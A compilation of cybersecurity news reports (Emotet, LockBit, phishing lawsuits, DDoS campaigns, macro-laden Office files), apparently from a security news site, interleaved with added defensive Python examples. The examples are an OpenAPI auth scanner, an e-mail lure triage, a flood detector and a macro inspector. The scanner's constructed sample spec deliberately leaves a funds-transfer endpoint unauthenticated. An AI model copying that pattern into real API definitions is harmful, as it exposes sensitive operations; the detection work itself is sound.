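    "components": {"securitySchemes": {"bearerAuth": {"type": "http", "scheme": "bearer"}}},
    "paths": {
        "/accounts": {"get": {"summary": "list accounts"}},                 # inherits bearerAuth
        "/transfer": {"post": {"summary": "move funds", "security": []}},   # opted out of auth
        "/health": {"get": {"summary": "liveness"}, "parameters": []},      # inherits bearerAuth
        "/admin/users": {"delete": {"security": [{"adminKey": []}]}},       # scheme never defined
    },
}

# Constructed sample with no document-level default at all.
SPEC_NO_DEFAULT = {
    "openapi": "3.0.3",
    "paths": {"/export": {"get": {"summary": "bulk export"}}},
}


if __name__ == "__main__":
    for f in unprotected_operations(SAMPLE_SPEC) + unprotected_operations(SPEC_NO_DEFAULT):
        print("%-6s %-14s %s" % f)
```

Run against a real spec, the output is a starting inventory: each line is an endpoint that either needs a security requirement added or a documented reason for being public.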

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic

 

According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting are among the threats aimed at the facility, the busiest port in the Western Hemisphere. In many cases the goal appears to be harming the US economy, although profit through extortion and data theft is also a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Emotet Malware: Shut Down Last Year, Now Showing a Strong Resurgence

 

The notorious Emotet malware operation is exhibiting a strong resurgence more than a year after being effectively shut down. Check Point researchers put the Windows software nasty at the top of their list as the most commonly deployed malware in a March threat index, threatening or infecting as many as 10% of organisations around the world during the month – an almost unbelievable figure, and more than double that of February. 

Now, according to Kaspersky Labs, a swiftly accelerating and sophisticated spam email campaign is intriguing targets with fraudulent emails designed to swindle them into unpacking and installing Emotet or Qbot malware, which can steal data, collect information on a compromised corporate network, and move laterally through the network to install ransomware or other trojans on networked computers. 

Qbot, which is associated with Emotet's operators, can also access and steal emails, Kaspersky's email threats protection group manager Andrey Kovtun wrote in a blog post this week. In February, Kaspersky found 3,000 malicious Emotet-linked emails, rising to 30,000 a month later, in languages including English, French, Italian, Polish, Russian, and Spanish. 

Kovtun wrote, "Some letters that cybercriminals send to the recipients contain a malicious attachment. In other cases, it has a link which leads to a file placed in a legitimate popular cloud-hosting service. Often, malware is contained in an encrypted archive, with the password mentioned in the e-mail body." 

The spam email often claims to include essential information, such as a commercial offer, in order to persuade the recipient to open the attachment or download the harmful file via the link. "Our experts have concluded that these e-mails are being distributed as part of a coordinated campaign that aims to spread banking Trojans," he wrote further. 
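The lure Kovtun describes, an encrypted archive with the password written in the message body, is something a mail gateway can check for directly, because the encryption flag is visible in the zip headers without a password. The following added example (not Kaspersky's code and not related to Emotet's own code) parses a message, checks every attachment for zip members flagged as encrypted, and looks for a password hint in the body. The e-mail, the addresses and the archive are constructed for the demonstration; since Python's `zipfile` cannot write encrypted archives, the sample builder patches the encryption flag bit into an ordinary zip containing inert text.

```python
"""Triage an e-mail for the lure pattern described above: an encrypted
archive attachment whose password is written in the message body.

Added example, not Kaspersky's or Emotet's code. The message and archive
below are constructed for the demonstration; the archive holds inert text.
"""
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Heuristic: a 'password' keyword followed by a token. Tune for your mail flow.
PASSWORD_HINT = re.compile(r"\b(?:password|passcode|pass)\b\s*[:=-]?\s*(\S+)", re.IGNORECASE)


def make_encrypted_looking_zip(name, payload):
    """Build a zip and set the 'encrypted' bit (0x1) in its headers.

    Constructed sample: zipfile cannot write encrypted archives, so the
    general-purpose flag is patched in the local header (offset 6) and the
    central-directory entry (offset 8). Only the flag changes, not the data.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, payload)
    data = bytearray(buf.getvalue())
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        i = data.find(sig)
        while i != -1:
            data[i + off] |= 0x01
            i = data.find(sig, i + 1)
    return bytes(data)


def archive_is_encrypted(blob):
    """True if any member of the zip is flagged as encrypted (flag bit 0)."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        return False


def triage(raw):
    """Return which attachments are encrypted archives and whether the body
    gives away a password; 'suspicious' is True when both hold."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body_parts, encrypted = [], []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename()
        if filename:
            blob = part.get_payload(decode=True) or b""
            if archive_is_encrypted(blob):  # content check, not an extension check
                encrypted.append(filename)
        elif part.get_content_type() == "text/plain":
            body_parts.append(part.get_content())
    hint = PASSWORD_HINT.search("\n".join(body_parts))
    return {
        "encrypted_attachments": encrypted,
        "password_in_body": hint.group(1) if hint else None,
        "suspicious": bool(encrypted) and hint is not None,
    }


def build_sample_email():
    """Constructed lure: a 'commercial offer' with the archive password in the body."""
    msg = EmailMessage()
    msg["From"] = "offers@example.invalid"   # placeholder addresses
    msg["To"] = "finance@example.invalid"
    msg["Subject"] = "Commercial offer"
    msg.set_content("Please review the attached offer.\nArchive password: Offer2022")
    msg.add_attachment(make_encrypted_looking_zip("offer.doc", b"inert sample text"),
                       maintype="application", subtype="zip", filename="offer.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(triage(build_sample_email()))
```

The check keys on the archive's own header bit rather than the file extension, so a renamed attachment is still caught; the password regex is deliberately loose and is the part to tune against real traffic.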

Cryptolaemus, a group of security researchers and system administrators formed more than two years ago to combat Emotet, announced on Twitter this week that one of the botnet subgroups has switched its loaders and stealer modules from 32-bit to 64-bit, a sign that the operators are still developing the malware. Emotet's return to the upper echelons of the malware world has been swift. In February 2021, Europol, together with police from the United States, Germany, the United Kingdom, and Ukraine, completed a multinational takedown of the primary botnet deploying Emotet, an operation that included raids on the accused operators' houses in Ukraine. 

The raid, according to Europol, substantially impacted Emotet's operations, which were used to infiltrate thousands of firms and millions of computers around the world. However, in publishing its March threat index, Check Point Research stated that Emotet resurfaced in November 2021 and has gained traction after the Trickbot botnet infrastructure was shut down in February. It is once again the most common malware. 

The researchers wrote, "This was solidified even further [in March] as many aggressive email campaigns have been distributing the botnet, including various Easter-themed phishing scams exploiting the buzz of the festivities. These emails were sent to victims all over the world with one such example using the subject 'Buona Pasqua, happy easter,' yet attached to the email was a malicious XLS file to deliver Emotet." 

Meta Takes Legal Action Against Cyber Criminals

 

Facebook's parent company, Meta Platforms, announced on Monday that it has filed a federal lawsuit in the U.S. state of California against malicious attackers who ran more than 39,000 phishing websites impersonating its digital properties to trick consumers into disclosing their username and password. 

“Today, we filed a federal lawsuit in California court to disrupt phishing attacks designed to deceive people into sharing their login credentials on fake login pages for Facebook, Messenger, Instagram, and WhatsApp. Phishing is a significant threat to millions of Internet users”, states the report. 

The social engineering strategy relied on rogue websites posing as Facebook, Messenger, Instagram, and WhatsApp login pages, which prompted victims to enter their login details; the defendants then captured those credentials. Meta is also seeking $500,000 from the unidentified actors. 

The attacks were conducted with the help of Ngrok, a relay service that redirected internet traffic to the malicious websites while concealing the true location of the phishing infrastructure. Meta stated that the frequency of these phishing attacks has increased since March 2021 and that it has worked with the relay service to suspend thousands of URLs pointing to phishing sites. 

The lawsuit comes just days after Facebook revealed it was making efforts to disrupt the activities of seven surveillance-for-hire firms that generated over 1,500 phony identities on Facebook and Instagram to target 50,000 users in over 100 countries. Meta announced last month that it has barred four harmful cyber groups from attacking journalists, humanitarian organizations, and anti-regime military forces in Afghanistan and Syria. 

“This lawsuit is one more step in our ongoing efforts to protect people’s safety and privacy, send a clear message to those trying to abuse our platform, and increase accountability of those who abuse technology. We will also continue to collaborate with online hosting and service providers to identify and disrupt phishing attacks as they occur. We proactively block and report instances of abuse to the hosting and security community, domain name registrars, privacy/proxy services, and others. And Meta blocks and shares phishing URLs so other platforms can also block them”, mentioned the report.

Google sued two Russian hackers

Google has filed lawsuits against two Russians - Dmitry Starovikov and Alexander Filippov. According to the company, they are behind the activities of a botnet called Glupteba.

The company claims that Glupteba has infected more than a million Windows devices worldwide, with infections growing by "thousands" a day. The botnet was used to steal Google user account data. Most often, infection occurred after users downloaded free applications from unofficial sources.

Beyond stealing and using other people's data, Glupteba was designed for covert cryptocurrency mining and for routing third-party traffic through infected computers and routers, which lets it relay illicit traffic through other people's devices.

Google notes Glupteba's technical sophistication. It relies on a blockchain, whose decentralized nature lets the botnet resist disruption. For the company, this is the first case of fighting a blockchain-backed botnet.

The botnet's main infrastructure has now been neutralized, and those who controlled the network of infected devices no longer have access to it. The company notes, however, that this holds only for the moment.

Google believes Starovikov and Filippov ran Glupteba, based on data in their Gmail accounts and Google Workspace applications. The company is seeking compensation for damages as well as a lifetime ban on their use of Google services.

According to experts, this could set a positive precedent. If the two Russians are actually punished significantly, it would noticeably weaken the attacker community in cyberspace; at a minimum, the hackers' sense of impunity would disappear. You can read how Google representatives tracked the hackers on the company's official website.

HHS Cybersecurity Agency Issues Threat Briefing on LockBit Ransomware

 

The Health Sector Cybersecurity Coordination Center (HC3) has issued a threat briefing on LockBit, a ransomware gang that has reportedly released a new variant. The group was behind the widely reported cyberattack on Accenture this summer, in which the company was reportedly hit with a $50 million ransom demand. 

LockBit is ransomware that locks users out of their computers and demands payment to restore access. It automatically scans the network for valuable targets, spreads to them, and locks every machine it can reach. It is used in targeted attacks against businesses and other organizations. 

LockBit was introduced in September 2019 and began advertising its "ransomware as a service" affiliate scheme in January 2020, according to HC3. 

In May 2020, it began collaborating with Maze, another ransomware organization, and in September of the same year, it debuted its very own leak site. LockBit v2.0 was released in June of this year. Furthermore, according to HC3, it employs a two-pronged extortion scheme involving the StealBit malware. It has improved encryption and circumvents user account control methods. 

"Threat actors continue to view unpatched systems as an easy, if not preferred, method of intrusion," wrote officials from the cybersecurity arm of the U.S. Department of Health and Human Services in its brief. 

It has also relaunched its affiliate program, in which affiliates set the ransom, choose a payment system, and receive the majority of the money before paying the LockBit organization its share. The program does not operate in Commonwealth of Independent States countries, including Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, and Uzbekistan. 

Based on an interview with a LockBit ransomware operator, the organization concluded that the malicious actors looked to have a "contradictory code of ethics." 

According to HC3, healthcare facilities are ideal targets, but the LockBit affiliate showed "a strong disdain for those who attack healthcare entities while displaying conflicting evidence about whether he targets them himself." 

"The U.S. also has lucrative targets, but with data privacy laws requiring victim companies to report all breaches, the incentive for such entities to pay the ransom is likely somewhat reduced," said HC3. 

"Cybercriminals are avid consumers of security news and remain up to date on the latest research and vulnerabilities, weaponizing that information to use in future attacks," it wrote. 

Threat advisories on various ransomware organizations, including BlackMatter, Conti, and Hive, have recently been published by the federal government. The alerts, however, haven't stopped the flood of ransomware news. Hive hacked a Missouri health center earlier this month and published patient names, Social Security numbers, and medical information on its blog.

NSA’s Cyber Chief Warned About the Increasing Cyber Threat

 

On Wednesday, 29 September, the head of the National Security Agency's cyber branch warned about the growing number of digital threats and the actors behind them. 

Rob Joyce, Director of the NSA Cybersecurity Directorate, stated during the ASPEN Cyber Summit in Colorado that nearly every single government in the world today has a cyber exploitation program. 

Joyce served as special assistant to the president and cybersecurity coordinator on the National Security Council in 2018, and has held many other roles at the nation's leading signals intelligence agency. 

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his evaluated statements on the so-called "Big Four" and the latest internet business of the foreign states who were historically the digital opponents of America — Russia, China, Iran, and North Korea. 

Starting with Russia, he said it is the disruptive force: often it tries not to raise its own position but to pull others down. Russia remains extremely active in intelligence gathering against critical infrastructure and other countries, and the problem is that it deploys disruptive effects aggressively around the world. The NSA has seen indications of pre-positioning in U.S. critical infrastructure, and that is something everyone must push back against. 

Turning to China, he said its activity is off the charts in scale and scope, with the number of Chinese cyber actors growing worldwide. The NSA rated them lower four or five years ago than it does today. They have always been broad, loud, and noisy, but the elite within that group is truly elite when it has such a vast resource base behind it. 

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

On Iran, he said it remains active in cyber operations; it was the first nation that came to mind when people spoke of the bank distributed denial-of-service operations and the Shamoon wiper malware. What the NSA observes now is that Iran concentrates heavily on regional matters, so its impact is not as broad. But it is capable, especially because its decision-making is less restrained, and it is a realistic threat. Iran sometimes does not appreciate how far it has gone in provoking the anger and concern of the wider community. 

Finally, he said North Korea remains intensely focused on generating income for the regime, which is largely unaffected by the many sanctions against it. It therefore had to develop ways to raise cash and realized it is simpler to steal Bitcoin than to steal from Bangladesh Bank; it has not gone after the largest banks as hard because it earns what it needs in the crypto realm. 

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money,” he added. 

Russian Electronic Voting System Struck by 19 DDoS Attacks in One Day

 

Yandex, the Russian technology and search engine powerhouse, disclosed last week that it had been hit by one of the world's biggest DDoS attacks ever recorded. 

A distributed denial-of-service (DDoS) attack involves flooding a website or service with a large amount of internet traffic until it stops working and eventually goes down. Cybercriminals have been known to create botnets and launch DDoS attacks using hacked systems or vulnerable/exposed Internet of Things (IoT) devices. 
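Because a DDoS is defined by volume arriving from many sources at once, the simplest defender-side signal is a per-target packet rate combined with a distinct-source count, which separates a distributed flood from a single misbehaving client. The following added example (not Yandex's or Rostelecom's tooling) applies that rule to per-packet flow records; the record format, thresholds, addresses and traffic are all constructed for the demonstration.

```python
"""Rate-based flood detection over per-packet flow records.

Added example, not Yandex's or Rostelecom's tooling. The record format,
thresholds and traffic below are constructed for illustration.
"""
from collections import defaultdict

# One record per packet: "<epoch seconds> <src ip> <dst ip> <proto> <bytes>"


def parse(line):
    ts, src, dst, proto, size = line.split()
    return int(ts), src, dst, proto, int(size)


def detect_floods(lines, pps_threshold=200, min_sources=50, window=1):
    """Bucket packets by (destination, time window) and flag buckets that
    exceed pps_threshold AND come from at least min_sources distinct
    sources. The source-count condition separates a distributed flood from
    one misbehaving client, which is a rate-limiting problem, not a DDoS."""
    buckets = defaultdict(lambda: {"pkts": 0, "bytes": 0, "srcs": set()})
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, _proto, size = parse(line)
        b = buckets[(dst, ts // window * window)]
        b["pkts"] += 1
        b["bytes"] += size
        b["srcs"].add(src)
    alerts = []
    for (dst, start), b in sorted(buckets.items()):
        pps = b["pkts"] / window
        if pps > pps_threshold and len(b["srcs"]) >= min_sources:
            alerts.append({"dst": dst, "window_start": start, "pps": pps,
                           "sources": len(b["srcs"]), "bytes": b["bytes"]})
    return alerts


def build_sample_flows():
    """Constructed traffic: 3 s of normal load, a 300-source flood in the
    4th second, then a single noisy client in the 5th second."""
    t0, target = 1631860000, "198.51.100.10"
    lines = []
    for sec in range(3):                       # baseline: 3 clients x 5 pps
        for i in range(3):
            lines += [f"{t0 + sec} 203.0.113.{i + 1} {target} tcp 512"] * 5
    for i in range(300):                       # flood: 300 sources x 2 pkts = 600 pps
        lines += [f"{t0 + 3} 198.18.{i // 256}.{i % 256} {target} udp 1400"] * 2
    lines += [f"{t0 + 4} 203.0.113.9 {target} tcp 64"] * 300  # one loud client, not a DDoS
    return "\n".join(lines)


if __name__ == "__main__":
    for a in detect_floods(build_sample_flows().splitlines()):
        print(a)
```

The noisy-client second is included on purpose: it exceeds the packet threshold but not the source threshold, so it is left for rate limiting rather than raised as a flood alert.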

Russia's remote electronic voting system has now become the next victim, in what appears to be a continuation of the targeted DDoS campaign. 

According to reports, the 8th Russian State Duma (lower house) elections took place between September 17 and September 19. Voters had to head to the polls to cast their vote for the heads of nine Russian regions and 39 regional parliaments. 

According to Russian news agency Tass, remote electronic voting took place in six locations, including Sevastopol and the regions of Kursk, Murmansk, Nizhny Novgorod, Rostov, and Yaroslavl. 

Around 19 DDoS attempts were thwarted, according to Mikhail Oseevsky, president of Rostelecom. The head of the country's major digital service provider, Rostelecom, told the reporters at the Central Election Commission's information centre that some of the DDoS assaults were very short, spanning only a few minutes, while the biggest lasted 5 hours and 32 minutes. 

“It (the DDoS attack) began early in the morning and ended in the middle of the day,” Oseevsky disclosed. 

Many of the country's digital resources, including the elections, state services websites, and the CEC's portal, were attacked, according to Oseevsky. 

He added that several attempts were made to launch large-scale attacks on these resources, but the department was well prepared to counter and minimise the threat. 

The assaults arose from a number of different countries which include: 
  • India 
  • China 
  • Brazil 
  • Russia 
  • Germany 
  • Thailand 
  • Lithuania 
  • Bangladesh 
  • United States 
According to the elections commission, three targeted cyberattacks were documented from abroad, two of which targeted the centre's main website and the third was a DDoS attack.

35 yrs Of Imprisonment for the Administrator of 200,000 DDoS Attacks

 

After a nine-day trial, a California jury found the administrator of two distributed denial of service (DDoS) operations guilty. Matthew Gatrel, 32, of Saint Charles, Illinois, operated two websites that let paying users launch over 200,000 DDoS attacks on private and public targets. 

Court filings disclose that Gatrel had operated DDoS services since October 2014 through two sites, DownThem and AmpNode. DownThem sold subscriptions to DDoS services (often called "booters" or "stressers"), while AmpNode supplied customers with pre-configured servers running DDoS attack programs and lists of vulnerable systems that could amplify an attack. 

Investigators found more than 2,000 registered customers in the DownThem database, and court documents state that users launched more than 200,000 DDoS attacks. The targets included households, schools, universities, municipal and local government websites, and financial organizations around the world. 

“Often called a “booting” service, DownThem itself relied upon powerful servers associated with Gatrel’s AmpNode bulletproof hosting service. Many AmpNode customers were themselves operating for-profit DDoS services” - the U.S. Department of Justice.

Customers could choose from several subscription tiers, each offering different attack capabilities such as duration, intensity, or the ability to run concurrent attacks. 

If the victim is accessible, the service would deploy "reflected amplification attacks" from AmpNode attack servers, employing "hundreds or thousands of other servers connected to the Internet." 

In this operation, Gatrel hadn't been alone. In 2018, Juan Martinez of Pasadena assisted him to operate the DownThem website. 

Gatrel faces a statutory maximum of 35 years in federal prison; sentencing is scheduled for January 27, 2022. He was found guilty of three counts: 

  • one count of conspiracy to commit unauthorized impairment of a protected computer;
  • one count of conspiracy to commit wire fraud;
  • one count of unauthorized impairment of a protected computer.

Martinez, unlike Gatrel, has already pleaded guilty; his sentencing is set for 2 December, and he faces a statutory maximum of 10 years in prison.

43% of all Malware Installations are Concealed in Microsoft Office Documents

 

The shift from office work to remote work has led companies to adopt hundreds of cloud applications, many of which may be vulnerable to attack or exploitation. This has widened the attack surface and exposed them to a slew of new threats. 

Although hiding malware in office documents has been around for a long time, it remains very effective at duping people. After embedding a hostile macro in an office document, malicious actors email the infected file to thousands of people and wait for potential victims to open it. A macro is a collection of commands bundled together to perform a task automatically. 
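Whether a modern Office document carries a macro at all can be determined without opening it, because an OOXML file is a zip container and the VBA project is a named part inside it. The following added example (not Netskope's or Atlas VPN's code) inspects a file for a `vbaProject.bin` part, a VBA content type in `[Content_Types].xml`, a legacy OLE container (which needs a separate OLE parser), and the tell-tale mismatch of VBA inside an extension where macros are not expected. The sample documents are built inline and their "macro" part is placeholder text, not real VBA.

```python
"""Check an Office file for embedded VBA and extension/content mismatches.

Added example, not Netskope's or Atlas VPN's code. Sample documents are
built inline; the 'vbaProject.bin' they contain is placeholder text, not
a real macro.
"""
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_FREE_EXTS = {"docx", "xlsx", "pptx"}      # macros are not expected under these extensions


def inspect_office_file(filename, blob):
    """Return a dict with the container format, whether VBA is present, and findings."""
    result = {"format": "unknown", "has_vba": False, "findings": []}
    if blob.startswith(OLE_MAGIC):
        result["format"] = "ole-binary"
        result["findings"].append("legacy OLE format can carry VBA; inspect with an OLE parser")
        return result
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        result["findings"].append("not an OOXML (zip) container")
        return result
    with zf:
        names = zf.namelist()
        result["format"] = "ooxml"
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            result["has_vba"] = True
            result["findings"].append("vbaProject.bin part present")
        if "[Content_Types].xml" in names:
            types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
            if VBA_CONTENT_TYPE in types_xml:
                result["has_vba"] = True
                result["findings"].append("content types declare a VBA project")
    ext = filename.lower().rsplit(".", 1)[-1]
    if result["has_vba"] and ext in MACRO_FREE_EXTS:
        result["findings"].append(f"VBA inside a .{ext}: extension does not match content")
    return result


def make_ooxml(with_macro):
    """Constructed minimal Word-style package, optionally with a VBA part."""
    types = ['<Default Extension="xml" ContentType="application/xml"/>']
    parts = {"word/document.xml": b"<w:document/>"}
    if with_macro:
        types.append(f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
        parts["word/vbaProject.bin"] = b"placeholder, not a real macro"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types>" + "".join(types) + "</Types>")
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    for name, blob in [("report.docx", make_ooxml(False)), ("invoice.docm", make_ooxml(True)),
                       ("invoice.docx", make_ooxml(True)), ("old.doc", OLE_MAGIC + b"\x00" * 512)]:
        print(name, inspect_office_file(name, blob))
```

A gateway that applies this check can quarantine or sandbox macro-bearing documents for review instead of relying on the recipient to notice the macro warning.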

According to recent research by the Atlas VPN team, malicious office documents account for 43 percent of all malware installations. Malicious office files are popular with cybercriminals because they can evade suspicion from most antivirus programs. 

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition. It examined office documents from all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. A year earlier, in the second quarter of 2020, only 14 percent of all downloaded malware consisted of malicious office documents. In the third quarter of last year the share rose to 38%. This growth was driven largely by remote work, as attackers discovered that malware-laden documents were effective. 

The effectiveness of EMOTET appears to have spread swiftly among cybercriminal gangs, motivating other hackers to adopt a similar approach. Another reason harmful documents succeed is that they can avoid detection by antivirus software and appear to be from a reliable source. 

Malware-infected document cyberattacks are designed to exploit the user's potential incapacity to perceive the danger. Only a blend of cybersecurity knowledge, training, and security software could provide the highest level of protection.

Fraudsters have taken advantage of Microsoft Office and Google Docs' popularity by introducing malicious code into the documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and human components. 

Driver's License Exploitation Scams Surge

 

The Covid epidemic has provided a ripe opportunity for cybercriminals, who are exploiting the fact that many targeted individuals are holding expired driver's licenses. 

According to Stateline, the phishing scams exploit the fact that several states issued emergency declarations allowing driver's licenses to remain valid past their expiry dates. As those extensions lapse, drivers must now ensure their licenses are renewed, and scammers are taking full advantage of that shift, Stateline reports. 

In conventional phishing, cybercriminals send malicious links or attachments by email, and victims inadvertently click on them. When fraudsters use text messages instead, the technique is known as "SMS phishing" or "smishing." 

According to state motor vehicle agencies, driver's license phishing scams that attempt to steal identities and personal information have been springing up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states where the frauds have been detected so far. 

Scam artists send SMS messages or emails falsely claiming that the target's license urgently needs updating because information is missing, or that it is about to expire and will be invalid within a few days. When a person clicks the link, a Google Forms page often opens, asking for personally identifiable information such as a Social Security number and date of birth. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

Many people in Illinois, according to Druker, received texts and emails from fraudsters posing as the secretary of state or employees of the state transportation department. Druker added that he did not know whether anyone had fallen for the ruses. 

After learning of the phishing and smishing campaign, Illinois officials notified the FBI and IRS, which worked with Google to take down the bogus web pages. According to Druker, the authorities have identified 1,035 sites so far, and Google has taken down nearly 900 of them. 

As per a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now employing door-to-door visits, along with telemarketing calls, messages, and social networking sites, to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.